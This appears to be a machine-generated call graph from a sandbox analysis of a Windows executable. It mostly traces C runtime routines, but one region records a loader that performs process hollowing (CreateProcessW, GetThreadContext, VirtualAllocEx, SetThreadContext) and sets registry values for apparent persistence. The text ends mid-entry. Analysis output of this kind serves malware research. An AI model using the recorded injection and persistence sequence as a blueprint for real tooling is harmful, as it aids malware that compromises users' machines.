API calls _free 7670->7681 7671 404535 _free 55 API calls 7676 40624a 7671->7676 7677 404535 _free 55 API calls 7672->7677 7673->7678 7674->7649 7679 404535 _free 55 API calls 7675->7679 7680 4087fe ___free_lconv_num 55 API calls 7676->7680 7677->7654 7678->7671 7682 406255 7678->7682 7679->7656 7680->7682 7681->7662 7681->7670 7682->7664 7683->7652 7687 404520 LeaveCriticalSection 7684->7687 7686 406811 7686->7639 7687->7686 7689 401aa5 LeaveCriticalSection 7688->7689 7690 401a86 7688->7690 7689->7230 7690->7689 7691 401a8d 7690->7691 7694 404520 LeaveCriticalSection 7691->7694 7693 401aa2 7693->7230 7694->7693 7696 4013a8 __wfsopen 7695->7696 7697 4013eb 7696->7697 7698 4013be _memset 7696->7698 7699 4013e3 __wfsopen 7696->7699 7708 401a08 7697->7708 7702 4024c9 __wfsopen 55 API calls 7698->7702 7699->7178 7704 4013d8 7702->7704 7706 4017ee __wfsopen 8 API calls 7704->7706 7706->7699 7709 401a18 7708->7709 7710 401a3a EnterCriticalSection 7708->7710 7709->7710 7711 401a20 7709->7711 7712 4013f1 7710->7712 7713 4043b6 __lock 55 API calls 7711->7713 7714 4011bc 7712->7714 7713->7712 7718 4011d7 _memset 7714->7718 7720 4011f2 7714->7720 7715 4011e2 7716 4024c9 __wfsopen 55 API calls 7715->7716 7717 4011e7 7716->7717 7719 4017ee __wfsopen 8 API calls 7717->7719 7718->7715 7718->7720 7723 401232 7718->7723 7719->7720 7728 401425 7720->7728 7722 401343 _memset 7726 4024c9 __wfsopen 55 API calls 7722->7726 7723->7720 7723->7722 7731 40194a 7723->7731 7738 401d04 7723->7738 7806 401829 7723->7806 7826 401ade 7723->7826 7726->7717 7729 401a77 __wfsopen 2 API calls 7728->7729 7730 40142b 7729->7730 7730->7699 7732 401954 7731->7732 7733 401969 7731->7733 7734 4024c9 __wfsopen 55 API calls 7732->7734 7733->7723 7735 401959 7734->7735 7736 4017ee __wfsopen 8 API calls 7735->7736 7737 401964 7736->7737 7737->7723 7739 401d25 7738->7739 7740 401d3c 7738->7740 7741 402495 __read_nolock 55 API calls 7739->7741 7742 402474 7740->7742 7746 401d76 7740->7746 7743 401d2a 7741->7743 7744 402495 __read_nolock 55 API calls 7742->7744 7745 4024c9 __wfsopen 55 API calls 7743->7745 7747 402479 7744->7747 7752 401d31 7745->7752 7748 401d7e 7746->7748 7755 401d95 7746->7755 7749 4024c9 __wfsopen 55 API calls 7747->7749 7750 402495 __read_nolock 55 API calls 7748->7750 7751 401d8a 7749->7751 7753 401d83 7750->7753 7754 4017ee __wfsopen 8 API calls 7751->7754 7752->7723 7759 4024c9 __wfsopen 55 API calls 7753->7759 7754->7752 7755->7752 7756 401daa 7755->7756 7758 401dc4 7755->7758 7761 401de2 7755->7761 7757 402495 __read_nolock 55 API calls 7756->7757 7757->7753 7758->7756 7760 401dcf 7758->7760 7759->7751 7763 404ed5 __read_nolock 55 API calls 7760->7763 7762 4045b5 __malloc_crt 55 API calls 7761->7762 7764 401df2 7762->7764 7765 401ee3 7763->7765 7766 401e15 7764->7766 7767 401dfa 7764->7767 7769 401f5c ReadFile 7765->7769 7774 401ef9 GetConsoleMode 7765->7774 7770 4052f5 __lseeki64_nolock 57 API calls 7766->7770 7768 4024c9 __wfsopen 55 API calls 7767->7768 7771 401dff 7768->7771 7772 40243c GetLastError 7769->7772 7773 401f7e 7769->7773 7770->7760 7775 402495 __read_nolock 55 API calls 7771->7775 7776 401f3c 7772->7776 7777 402449 7772->7777 7773->7772 7781 401f4e 7773->7781 7778 401f59 7774->7778 7779 401f0d 7774->7779 7775->7752 7785 4024a8 __dosmaperr 55 API calls 7776->7785 7788 401f42 7776->7788 7780 4024c9 __wfsopen 55 API calls 7777->7780 7778->7769 7779->7778 7782 401f13 ReadConsoleW 7779->7782 7783 40244e 7780->7783 7781->7788 7790 401fb3 7781->7790 7793 402220 7781->7793 7782->7781 7784 401f36 GetLastError 7782->7784 7786 402495 __read_nolock 55 API calls 7783->7786 7784->7776 7785->7788 7786->7788 7787 404535 _free 55 API calls 7787->7752 7788->7752 7788->7787 7791 40201f ReadFile 7790->7791 7797 4020a0 7790->7797 7794 402040 GetLastError 7791->7794 7804 40204a 7791->7804 7792 402326 ReadFile 7799 402349 GetLastError 7792->7799 7805 402357 7792->7805 7793->7788 7793->7792 7794->7804 7795 40215d 7800 40210d MultiByteToWideChar 7795->7800 7801 4052f5 __lseeki64_nolock 57 API calls 7795->7801 7796 40214d 7798 4024c9 __wfsopen 55 API calls 7796->7798 7797->7788 7797->7795 7797->7796 7797->7800 7798->7788 7799->7805 7800->7784 7800->7788 7801->7800 7802 4052f5 __lseeki64_nolock 57 API calls 7802->7804 7803 4052f5 __lseeki64_nolock 57 API calls 7803->7805 7804->7790 7804->7802 7805->7793 7805->7803 7807 401834 7806->7807 7811 401849 7806->7811 7808 4024c9 __wfsopen 55 API calls 7807->7808 7809 401839 7808->7809 7810 4017ee __wfsopen 8 API calls 7809->7810 7818 401844 7810->7818 7812 40187e 7811->7812 7811->7818 7873 40413c 7811->7873 7814 40194a __filbuf 55 API calls 7812->7814 7815 401892 7814->7815 7840 401bf0 7815->7840 7817 401899 7817->7818 7819 40194a __filbuf 55 API calls 7817->7819 7818->7723 7820 4018bc 7819->7820 7820->7818 7821 40194a __filbuf 55 API calls 7820->7821 7822 4018c8 7821->7822 7822->7818 7823 40194a __filbuf 55 API calls 7822->7823 7824 4018d5 7823->7824 7825 40194a __filbuf 55 API calls 7824->7825 7825->7818 7827 401aed 7826->7827 7835 401ae9 _memmove 7826->7835 7828 401af4 7827->7828 7832 401b07 _memset 7827->7832 7829 4024c9 __wfsopen 55 API calls 7828->7829 7830 401af9 7829->7830 7831 4017ee __wfsopen 8 API calls 7830->7831 7831->7835 7833 401b35 7832->7833 7834 401b3e 7832->7834 7832->7835 7836 4024c9 __wfsopen 55 API calls 7833->7836 7834->7835 7837 4024c9 __wfsopen 55 API calls 7834->7837 7835->7723 7838 401b3a 7836->7838 7837->7838 7839 4017ee __wfsopen 8 API calls 7838->7839 7839->7835 7841 401bfc __wfsopen 7840->7841 7842 401c20 7841->7842 7843 401c09 7841->7843 7845 401ce4 7842->7845 7847 401c34 7842->7847 7844 402495 __read_nolock 55 API calls 7843->7844 7846 401c0e 7844->7846 7848 402495 __read_nolock 55 API calls 7845->7848 7849 4024c9 __wfsopen 55 API calls 7846->7849 7850 401c52 7847->7850 7851 401c5f 7847->7851 7857 401c57 7848->7857 7868 401c15 __wfsopen 7849->7868 7852 402495 __read_nolock 55 API calls 7850->7852 7853 401c81 7851->7853 7854 401c6c 7851->7854 7852->7857 7855 404f29 ___lock_fhandle 56 API calls 7853->7855 7858 402495 __read_nolock 55 API calls 7854->7858 7859 401c87 7855->7859 7856 4024c9 __wfsopen 55 API calls 7860 401c79 7856->7860 7857->7856 7861 401c71 7858->7861 7862 401c9a 7859->7862 7863 401cad 7859->7863 7866 4017ee __wfsopen 8 API calls 7860->7866 7864 4024c9 __wfsopen 55 API calls 7861->7864 7865 401d04 __read_nolock 67 API calls 7862->7865 7867 4024c9 __wfsopen 55 API calls 7863->7867 7864->7860 7869 401ca6 7865->7869 7866->7868 7870 401cb2 7867->7870 7868->7817 7876 401cdc 7869->7876 7871 402495 __read_nolock 55 API calls 7870->7871 7871->7869 7874 4045b5 __malloc_crt 55 API calls 7873->7874 7875 404151 7874->7875 7875->7812 7879 4052cf LeaveCriticalSection 7876->7879 7878 401ce2 7878->7868 7879->7878 7883 40329c 7880->7883 7882 403143 7884 4032a8 __wfsopen 7883->7884 7885 4043b6 __lock 48 API calls 7884->7885 7886 4032af 7885->7886 7888 4032dd DecodePointer 7886->7888 7890 403368 __cinit 7886->7890 7889 4032f4 DecodePointer 7888->7889 7888->7890 7902 403304 7889->7902 7903 4033b6 7890->7903 7892 4033c5 __wfsopen 7892->7882 7894 403311 EncodePointer 7894->7902 7895 4033ad 7896 403112 _fast_error_exit 3 API calls 7895->7896 7898 4033b6 7896->7898 7897 403321 DecodePointer EncodePointer 7900 403333 DecodePointer DecodePointer 7897->7900 7899 4033c3 7898->7899 7908 404520 LeaveCriticalSection 7898->7908 7899->7882 7900->7902 7902->7890 7902->7894 7902->7897 7904 403396 7903->7904 7905 4033bc 7903->7905 7904->7892 7907 404520 LeaveCriticalSection 7904->7907 7909 404520 LeaveCriticalSection 7905->7909 7907->7895 7908->7899 7909->7904 8229 409615 8230 40961c __cfltcvt_init 8229->8230 8231 409627 8230->8231 8233 40b3ba 8230->8233 8239 40c29f 8233->8239 8235 40b3cd 8236 40b3d4 8235->8236 8237 4017fe __invoke_watson 8 API calls 8235->8237 8236->8231 8238 40b3e0 8237->8238 8240 40c2bb __control87 8239->8240 8242 40c2db __control87 8239->8242 8241 4024c9 __wfsopen 55 API calls 8240->8241 8243 40c2d1 8241->8243 8242->8235 8244 4017ee __wfsopen 8 API calls 8243->8244 8244->8242 6543 9f0809 6557 9f06f7 GetPEB 6543->6557 6545 9f086e 6546 9f0b19 CreateFileW 6545->6546 6547 9f0b46 6546->6547 6548 9f0b41 6546->6548 6547->6548 6549 9f0b5c VirtualAlloc 6547->6549 6549->6548 6550 9f0b79 ReadFile 6549->6550 6550->6548 6551 9f0b97 FindCloseChangeNotification 6550->6551 6552 9f0bab 6551->6552 6558 9f145c 6552->6558 6557->6545 6583 9f06f7 GetPEB 6558->6583 6560 9f1711 6563 9f0bbf 6560->6563 6584 9f199a 6560->6584 6569 9f0e70 6563->6569 6565 9f1904 6565->6563 6566 9f190f RegGetValueW 6565->6566 6566->6563 6567 9f193c RegOpenKeyExW 6566->6567 6567->6565 6568 9f1964 RegSetValueExW 6567->6568 6568->6563 6602 9f06f7 GetPEB 6569->6602 6571 9f0ec7 6572 9f0fb2 6571->6572 6574 9f0fbf 6571->6574 6582 9f0bc7 ExitProcess 6571->6582 6603 9f1196 6572->6603 6574->6582 6624 9f0261 6574->6624 6576 9f10c5 6577 9f1132 6576->6577 6578 9f0261 11 API calls 6576->6578 6576->6582 6579 9f0261 11 API calls 6577->6579 6578->6576 6580 9f1151 6579->6580 6580->6582 6633 9f01b2 6580->6633 6583->6560 6600 9f06f7 GetPEB 6584->6600 6586 9f19f8 6587 9f1a2e PathFileExistsW 6586->6587 6588 9f18e6 6587->6588 6589 9f1a43 CreateDirectoryW 6587->6589 6588->6563 6590 9f1a5c 6588->6590 6589->6588 6601 9f06f7 GetPEB 6590->6601 6592 9f1ac2 6593 9f1b48 PathFileExistsW 6592->6593 6594 9f1b63 CreateFileW 6593->6594 6595 9f1b56 6593->6595 6594->6595 6596 9f1b8b 6594->6596 6595->6565 6596->6595 6597 9f1ba3 VirtualAlloc 6596->6597 6597->6595 6598 9f1bc3 ReadFile 6597->6598 6598->6595 6599 9f1bdd FindCloseChangeNotification CreateFileW WriteFile 6598->6599 6599->6595 6600->6586 6601->6592 6602->6571 6642 9f06f7 GetPEB 6603->6642 6605 9f11a4 6606 9f12d2 CreateProcessW 6605->6606 6623 9f12ad 6605->6623 6607 9f12e9 GetThreadContext 6606->6607 6606->6623 6608 9f130c ReadProcessMemory 6607->6608 6607->6623 6609 9f1330 6608->6609 6608->6623 6610 9f1363 VirtualAllocEx 6609->6610 6643 9f0360 6609->6643 6611 9f138d 6610->6611 6610->6623 6613 9f0261 11 API calls 6611->6613 6616 9f13a3 6613->6616 6614 9f1357 6614->6610 6614->6623 6615 9f13fd 6618 9f0261 11 API calls 6615->6618 6616->6615 6617 9f0261 11 API calls 6616->6617 6616->6623 6617->6616 6619 9f1417 6618->6619 6620 9f1420 SetThreadContext 6619->6620 6619->6623 6621 9f1445 6620->6621 6620->6623 6622 9f01b2 11 API calls 6621->6622 6622->6623 6623->6582 6625 9f027c 6624->6625 6626 9f0736 GetPEB 6625->6626 6627 9f029d 6626->6627 6628 9f032f 6627->6628 6629 9f02a5 6627->6629 6677 9f017c 6628->6677 6630 9f03f8 10 API calls 6629->6630 6632 9f0316 6630->6632 6632->6576 6634 9f01cd 6633->6634 6635 9f0736 GetPEB 6634->6635 6636 9f01ee 6635->6636 6637 9f0238 6636->6637 6638 9f01f2 6636->6638 6680 9f018e 6637->6680 6639 9f03f8 10 API calls 6638->6639 6641 9f022d 6639->6641 6641->6582 6642->6605 6644 9f0373 6643->6644 6652 9f0736 GetPEB 6644->6652 6646 9f0394 6647 9f03de 6646->6647 6648 9f0398 6646->6648 6668 9f01a0 6647->6668 6654 9f03f8 GetPEB 6648->6654 6651 9f03d3 6651->6614 6653 9f0759 6652->6653 6653->6646 6655 9f045d 6654->6655 6671 9f0772 GetPEB 6655->6671 6658 9f04e9 6659 9f04f9 VirtualAlloc 6658->6659 6660 9f05c2 6658->6660 6659->6660 6661 9f050f ReadFile 6659->6661 6662 9f0609 VirtualFree 6660->6662 6663 9f0614 6660->6663 6661->6660 6664 9f0524 VirtualAlloc 6661->6664 6662->6663 6663->6651 6664->6660 6665 9f0547 6664->6665 6665->6660 6666 9f05ad FindCloseChangeNotification 6665->6666 6667 9f05b1 VirtualFree 6665->6667 6666->6667 6667->6660 6669 9f03f8 10 API calls 6668->6669 6670 9f01aa 6669->6670 6670->6651 6672 9f0785 6671->6672 6674 9f04da CreateFileW 6672->6674 6675 9f061d GetPEB 6672->6675 6674->6658 6674->6660 6676 9f064d 6675->6676 6676->6672 6678 9f03f8 10 API calls 6677->6678 6679 9f0186 6678->6679 6679->6632 6681 9f03f8 10 API calls 6680->6681 6682 9f0198 6681->6682 6682->6641 8245 40b299 8248 40b2b1 8245->8248 8249 40b2c2 8248->8249 8250 40b2db 8248->8250 8254 409539 8249->8254 8263 4095c7 8250->8263 8253 40b2ac 8255 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8254->8255 8256 40955d 8255->8256 8266 40a174 8256->8266 8261 40412d __cftof_l 6 API calls 8262 4095c3 8261->8262 8262->8253 8278 409495 8263->8278 8267 40a1bc 8266->8267 8273 40a1cc ___mtold12 8266->8273 8268 4024c9 __wfsopen 55 API calls 8267->8268 8269 40a1c1 8268->8269 8270 4017ee __wfsopen 8 API calls 8269->8270 8270->8273 8271 40412d __cftof_l 6 API calls 8272 409575 8271->8272 8274 409690 8272->8274 8273->8271 8277 4096e8 8274->8277 8275 40412d __cftof_l 6 API calls 8276 409582 8275->8276 8276->8261 8277->8275 8279 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8278->8279 8280 4094c2 8279->8280 8281 40a174 ___strgtold12_l 55 API calls 8280->8281 8282 4094da 8281->8282 8287 409c02 8282->8287 8285 40412d __cftof_l 6 API calls 8286 409535 8285->8286 8286->8253 8290 409c5a 8287->8290 8288 40412d __cftof_l 6 API calls 8289 4094f7 8288->8289 8289->8285 8290->8288 7910 404d5c IsProcessorFeaturePresent 7911 404d82 7910->7911 7912 402ddc 7914 402de8 __wfsopen 7912->7914 7913 402e01 7917 404535 _free 55 API calls 7913->7917 7919 402e10 7913->7919 7914->7913 7915 404535 _free 55 API calls 7914->7915 7916 402ef0 __wfsopen 7914->7916 7915->7913 7917->7919 7918 402e1f 7921 402e2e 7918->7921 7922 404535 _free 55 API calls 7918->7922 7919->7918 7920 404535 _free 55 API calls 7919->7920 7920->7918 7923 402e3d 7921->7923 7924 404535 _free 55 API calls 7921->7924 7922->7921 7925 402e4c 7923->7925 7926 404535 _free 55 API calls 7923->7926 7924->7923 7927 402e5b 7925->7927 7928 404535 _free 55 API calls 7925->7928 7926->7925 7929 402e6d 7927->7929 7930 404535 _free 55 API calls 7927->7930 7928->7927 7931 4043b6 __lock 55 API calls 7929->7931 7930->7929 7934 402e75 7931->7934 7932 402e98 7944 402efc 7932->7944 7934->7932 7936 404535 _free 55 API calls 7934->7936 7936->7932 7937 4043b6 __lock 55 API calls 7942 402eac ___removelocaleref 7937->7942 7938 402edd 7947 402f08 7938->7947 7941 404535 _free 55 API calls 7941->7916 7942->7938 7943 4061f1 ___freetlocinfo 55 API calls 7942->7943 7943->7938 7950 404520 LeaveCriticalSection 7944->7950 7946 402ea5 7946->7937 7951 404520 LeaveCriticalSection 7947->7951 7949 402eea 7949->7941 7950->7946 7951->7949 8291 40a91c 8294 40a93d 8291->8294 8293 40a938 8295 40a9a7 8294->8295 8296 40a948 8294->8296 8362 40ae8e 8295->8362 8296->8295 8298 40a94d 8296->8298 8299 40a952 8298->8299 8301 40a96b 8298->8301 8308 40b048 8299->8308 8302 40a98e 8301->8302 8304 40a975 8301->8304 8349 40a9c3 8302->8349 8327 40b109 8304->8327 8306 40a98c 8306->8293 8379 40c10f 8308->8379 8311 40b08d 8314 40b0a5 8311->8314 8315 40b095 8311->8315 8312 40b07d 8313 4024c9 __wfsopen 55 API calls 8312->8313 8316 40b082 8313->8316 8391 40bf97 8314->8391 8317 4024c9 __wfsopen 55 API calls 8315->8317 8318 4017ee __wfsopen 8 API calls 8316->8318 8319 40b09a 8317->8319 8321 40b089 8318->8321 8322 4017ee __wfsopen 8 API calls 8319->8322 8325 40412d __cftof_l 6 API calls 8321->8325 8322->8321 8323 40b0d8 8323->8321 8400 40af5c 8323->8400 8326 40a966 8325->8326 8326->8293 8328 40c10f __fltout2 55 API calls 8327->8328 8329 40b137 8328->8329 8330 40b151 8329->8330 8331 40b13e 8329->8331 8333 40b159 8330->8333 8334 40b16c 8330->8334 8332 4024c9 __wfsopen 55 API calls 8331->8332 8335 40b143 8332->8335 8336 4024c9 __wfsopen 55 API calls 8333->8336 8337 40bf97 __fptostr 55 API calls 8334->8337 8338 4017ee __wfsopen 8 API calls 8335->8338 8339 40b15e 8336->8339 8341 40b198 8337->8341 8342 40b14a 8338->8342 8340 4017ee __wfsopen 8 API calls 8339->8340 8340->8342 8341->8342 8344 40b1de 8341->8344 8347 40b1b8 8341->8347 8343 40412d __cftof_l 6 API calls 8342->8343 8346 40b204 8343->8346 8429 40ad3d 8344->8429 8346->8306 8348 40af5c __cftof2_l 55 API calls 8347->8348 8348->8342 8350 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8349->8350 8351 40a9e8 8350->8351 8352 40a9ff 8351->8352 8353 40aa08 8351->8353 8354 4024c9 __wfsopen 55 API calls 8352->8354 8356 40aa11 8353->8356 8359 40aa25 8353->8359 8355 40aa04 8354->8355 8358 4017ee __wfsopen 8 API calls 8355->8358 8357 4024c9 __wfsopen 55 API calls 8356->8357 8357->8355 8361 40aa20 _memset __alldvrm __cftoa_l _strrchr 8358->8361 8359->8361 8461 40ad1f 8359->8461 8361->8306 8363 40c10f __fltout2 55 API calls 8362->8363 8364 40aec0 8363->8364 8365 40aed7 8364->8365 8366 40aec7 8364->8366 8367 40aede 8365->8367 8370 40aee8 8365->8370 8368 4024c9 __wfsopen 55 API calls 8366->8368 8369 4024c9 __wfsopen 55 API calls 8367->8369 8371 40aecc 8368->8371 8369->8371 8372 40bf97 __fptostr 55 API calls 8370->8372 8373 4017ee __wfsopen 8 API calls 8371->8373 8374 40af28 8372->8374 8375 40aed3 8373->8375 8374->8375 8376 40ad3d __cftoe2_l 55 API calls 8374->8376 8377 40412d __cftof_l 6 API calls 8375->8377 8376->8375 8378 40af58 8377->8378 8378->8306 8380 40c138 ___dtold 8379->8380 8407 40c3ad 8380->8407 8385 40c190 8388 4017fe __invoke_watson 8 API calls 8385->8388 8386 40c17a 8387 40412d __cftof_l 6 API calls 8386->8387 8389 40b076 8387->8389 8390 40c19c 8388->8390 8389->8311 8389->8312 8392 40bfa9 8391->8392 8393 40bfbf 8391->8393 8394 4024c9 __wfsopen 55 API calls 8392->8394 8393->8392 8397 40bfc5 8393->8397 8395 40bfae 8394->8395 8396 4017ee __wfsopen 8 API calls 8395->8396 8399 40bfb8 _memmove _strlen 8396->8399 8398 4024c9 __wfsopen 55 API calls 8397->8398 8397->8399 8398->8395 8399->8323 8401 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8400->8401 8402 40af79 8401->8402 8403 4024c9 __wfsopen 55 API calls 8402->8403 8406 40af95 _memset __shift 8402->8406 8404 40af8b 8403->8404 8405 4017ee __wfsopen 8 API calls 8404->8405 8405->8406 8406->8321 8409 40c402 8407->8409 8408 40c474 8412 40b7ad __fltout2 55 API calls 8408->8412 8409->8408 8413 40c48d 8409->8413 8414 40c414 8409->8414 8410 40412d __cftof_l 6 API calls 8411 40c153 8410->8411 8420 40b7ad 8411->8420 8412->8414 8416 40b7ad __fltout2 55 API calls 8413->8416 8415 40c425 8414->8415 8419 40cd49 8414->8419 8415->8410 8416->8414 8417 4017fe __invoke_watson 8 API calls 8418 40cd80 8417->8418 8419->8417 8421 40b7c6 8420->8421 8422 40b7b8 8420->8422 8423 4024c9 __wfsopen 55 API calls 8421->8423 8422->8421 8426 40b7dc 8422->8426 8424 40b7cd 8423->8424 8425 4017ee __wfsopen 8 API calls 8424->8425 8427 40b7d7 8425->8427 8426->8427 8428 4024c9 __wfsopen 55 API calls 8426->8428 8427->8385 8427->8386 8428->8424 8430 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8429->8430 8431 40ad50 8430->8431 8432 40ad5d 8431->8432 8433 40ad66 8431->8433 8434 4024c9 __wfsopen 55 API calls 8432->8434 8436 40ad7b 8433->8436 8439 40ad8f __shift 8433->8439 8435 40ad62 8434->8435 8438 4017ee __wfsopen 8 API calls 8435->8438 8437 4024c9 __wfsopen 55 API calls 8436->8437 8437->8435 8444 40ad8a _memmove 8438->8444 8440 40b7ad __fltout2 55 API calls 8439->8440 8441 40ae06 8440->8441 8442 4017fe __invoke_watson 8 API calls 8441->8442 8441->8444 8443 40ae8d 8442->8443 8445 40c10f __fltout2 55 API calls 8443->8445 8444->8342 8446 40aec0 8445->8446 8447 40aed7 8446->8447 8448 40aec7 8446->8448 8449 40aee8 8447->8449 8450 40aede 8447->8450 8451 4024c9 __wfsopen 55 API calls 8448->8451 8454 40bf97 __fptostr 55 API calls 8449->8454 8452 4024c9 __wfsopen 55 API calls 8450->8452 8453 40aecc 8451->8453 8452->8453 8455 4017ee __wfsopen 8 API calls 8453->8455 8456 40af28 8454->8456 8457 40aed3 8455->8457 8456->8457 8458 40ad3d __cftoe2_l 55 API calls 8456->8458 8459 40412d __cftof_l 6 API calls 8457->8459 8458->8457 8460 40af58 8459->8460 8460->8342 8462 40ae8e __cftoe_l 55 API calls 8461->8462 8463 40ad38 8462->8463 8463->8361 7952 405fe0 RtlUnwind 7953 4019e1 7960 4042c9 7953->7960 7956 4019f4 7958 404535 _free 55 API calls 7956->7958 7959 4019ff 7958->7959 7973 4042d2 7960->7973 7962 4019e6 7962->7956 7963 404182 7962->7963 7964 40418e __wfsopen 7963->7964 7965 4043b6 __lock 55 API calls 7964->7965 7968 40419a 7965->7968 7966 4041ff 8003 404216 7966->8003 7968->7966 7971 4041d3 DeleteCriticalSection 7968->7971 7990 40752f 7968->7990 7969 40420b __wfsopen 7969->7956 7972 404535 _free 55 API calls 7971->7972 7972->7968 7974 4042de __wfsopen 7973->7974 7975 4043b6 __lock 55 API calls 7974->7975 7982 4042ed 7975->7982 7976 40438b 7986 4043ad 7976->7986 7978 401a47 __getstream 56 API calls 7978->7982 7979 404397 __wfsopen 7979->7962 7981 40421f 79 API calls __fflush_nolock 7981->7982 7982->7976 7982->7978 7982->7981 7983 40437a 7982->7983 7984 401ab1 __getstream 2 API calls 7983->7984 7985 404388 7984->7985 7985->7982 7989 404520 LeaveCriticalSection 7986->7989 7988 4043b4 7988->7979 7989->7988 7991 40753b __wfsopen 7990->7991 7992 407567 7991->7992 7993 40754f 7991->7993 7996 401a08 __lock_file 56 API calls 7992->7996 7999 40755f __wfsopen 7992->7999 7994 4024c9 __wfsopen 55 API calls 7993->7994 7995 407554 7994->7995 7997 4017ee __wfsopen 8 API calls 7995->7997 7998 407579 7996->7998 7997->7999 8006 4074c3 7998->8006 7999->7968 8065 404520 LeaveCriticalSection 8003->8065 8005 40421d 8005->7969 8007 4074d2 8006->8007 8008 4074e6 8006->8008 8009 4024c9 __wfsopen 55 API calls 8007->8009 8015 4074e2 8008->8015 8025 404265 8008->8025 8010 4074d7 8009->8010 8012 4017ee __wfsopen 8 API calls 8010->8012 8012->8015 8022 40759e 8015->8022 8017 40194a __filbuf 55 API calls 8018 407500 8017->8018 8035 408350 8018->8035 8020 407506 8020->8015 8021 404535 _free 55 API calls 8020->8021 8021->8015 8023 401a77 __wfsopen 2 API calls 8022->8023 8024 4075a4 8023->8024 8024->7999 8026 404278 8025->8026 8030 40429c 8025->8030 8027 40194a __filbuf 55 API calls 8026->8027 8026->8030 8028 404295 8027->8028 8029 40768f __write 75 API calls 8028->8029 8029->8030 8031 4090f1 8030->8031 8032 4074fa 8031->8032 8033 4090fe 8031->8033 8032->8017 8033->8032 8034 404535 _free 55 API calls 8033->8034 8034->8032 8036 40835c __wfsopen 8035->8036 8037 408380 8036->8037 8038 408369 8036->8038 8039 40840b 8037->8039 8042 408390 8037->8042 8040 402495 __read_nolock 55 API calls 8038->8040 8043 402495 __read_nolock 55 API calls 8039->8043 8041 40836e 8040->8041 8044 4024c9 __wfsopen 55 API calls 8041->8044 8045 4083b8 8042->8045 8046 4083ae 8042->8046 8047 4083b3 8043->8047 8058 408375 __wfsopen 8044->8058 8049 404f29 ___lock_fhandle 56 API calls 8045->8049 8048 402495 __read_nolock 55 API calls 8046->8048 8050 4024c9 __wfsopen 55 API calls 8047->8050 8048->8047 8051 4083be 8049->8051 8052 408417 8050->8052 8053 4083d1 8051->8053 8054 4083dc 8051->8054 8056 4017ee __wfsopen 8 API calls 8052->8056 8057 40842b __close_nolock 58 API calls 8053->8057 8055 4024c9 __wfsopen 55 API calls 8054->8055 8059 4083d7 8055->8059 8056->8058 8057->8059 8058->8020 8061 408403 8059->8061 8064 4052cf LeaveCriticalSection 8061->8064 8063 408409 8063->8058 8064->8063 8065->8005 8464 401623 8467 402c81 8464->8467 8468 402f29 __getptd_noexit 55 API calls 8467->8468 8469 401634 8468->8469 8470 406ba6 8471 40456d __calloc_crt 55 API calls 8470->8471 8472 406bb0 EncodePointer 8471->8472 8473 406bc9 8472->8473 8066 40866d 8067 408679 __wfsopen 8066->8067 8068 4043b6 __lock 55 API calls 8067->8068 8070 4086b0 __wfsopen 8067->8070 8069 40868d 8068->8069 8071 40646b __updatetlocinfoEx_nolock 55 API calls 8069->8071 8072 40869d 8071->8072 8074 4086b6 8072->8074 8077 404520 LeaveCriticalSection 8074->8077 8076 4086bd 8076->8070 8077->8076 8078 40196e 8079 40197b 8078->8079 8080 40456d __calloc_crt 55 API calls 8079->8080 8081 401995 8080->8081 8082 4019ae 8081->8082 8083 40456d __calloc_crt 55 API calls 8081->8083 8083->8082 8084 402b70 8085 402b82 8084->8085 8087 402b90 @_EH4_CallFilterFunc@8 8084->8087 8086 40412d __cftof_l 6 API calls 8085->8086 8086->8087 8474 402c32 8475 402c67 8474->8475 8476 402c42 8474->8476 8476->8475 8481 406117 8476->8481 8482 406123 __wfsopen 8481->8482 8483 402f11 __write_nolock 55 API calls 8482->8483 8484 406128 8483->8484 8487 4086bf 8484->8487 8488 4086c4 _abort 8487->8488 8489 4086cf 8488->8489 8497 406d6e 8488->8497 8491 4086d9 IsProcessorFeaturePresent 8489->8491 8492 4086f7 8489->8492 8493 4086e4 8491->8493 8494 4031e6 _raise 55 API calls 8492->8494 8495 401691 __call_reportfault 7 API calls 8493->8495 8496 408701 8494->8496 8495->8492 8499 406d7a __wfsopen 8497->8499 8498 406de4 8502 406df3 8498->8502 8504 406db0 _siglookup 8498->8504 8499->8498 8500 406dab 8499->8500 8499->8502 8499->8504 8501 402f29 __getptd_noexit 55 API calls 8500->8501 8501->8504 8503 4024c9 __wfsopen 55 API calls 8502->8503 8505 406df8 8503->8505 8506 406e51 8504->8506 8508 4031e6 _raise 55 API calls 8504->8508 8514 406db9 __wfsopen 8504->8514 8507 4017ee __wfsopen 8 API calls 8505->8507 8509 4043b6 __lock 55 API calls 8506->8509 8512 406e5c 8506->8512 8507->8514 8508->8506 8509->8512 8510 406ebe EncodePointer 8511 406e91 8510->8511 8515 406eef 8511->8515 8512->8510 8512->8511 8514->8489 8516 406ef3 8515->8516 8517 406efa 8515->8517 8519 404520 LeaveCriticalSection 8516->8519 8517->8514 8519->8517 8088 40b2f3 8091 40b304 8088->8091 8092 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8091->8092 8093 40b316 8092->8093 8100 40b781 8093->8100 8095 40b322 8096 40b336 8095->8096 8105 40b613 8095->8105 8097 40b781 __forcdecpt_l 62 API calls 8096->8097 8099 40b300 8097->8099 8101 40b78d 8100->8101 8102 40b79f 8100->8102 8101->8095 8110 40b63e 8102->8110 8106 40b630 8105->8106 8107 40b61f 8105->8107 8188 40b5c1 8106->8188 8107->8095 8111 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8110->8111 8112 40b651 8111->8112 8113 40b6bd 8112->8113 8114 40b65d 8112->8114 8115 40b6db 8113->8115 8129 409121 8113->8129 8121 40b672 8114->8121 8122 40c2fc 8114->8122 8117 4024c9 __wfsopen 55 API calls 8115->8117 8119 40b6e1 8115->8119 8117->8119 8132 408de9 8119->8132 8121->8095 8123 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8122->8123 8124 40c30e 8123->8124 8125 409121 __isleadbyte_l 55 API calls 8124->8125 8128 40c31b 8124->8128 8126 40c33f 8125->8126 8137 408f45 8126->8137 8128->8121 8130 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8129->8130 8131 409132 8130->8131 8131->8115 8133 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8132->8133 8134 408dfa 8133->8134 8159 408be5 8134->8159 8138 405da9 _LocaleUpdate::_LocaleUpdate 55 API calls 8137->8138 8139 408f56 8138->8139 8142 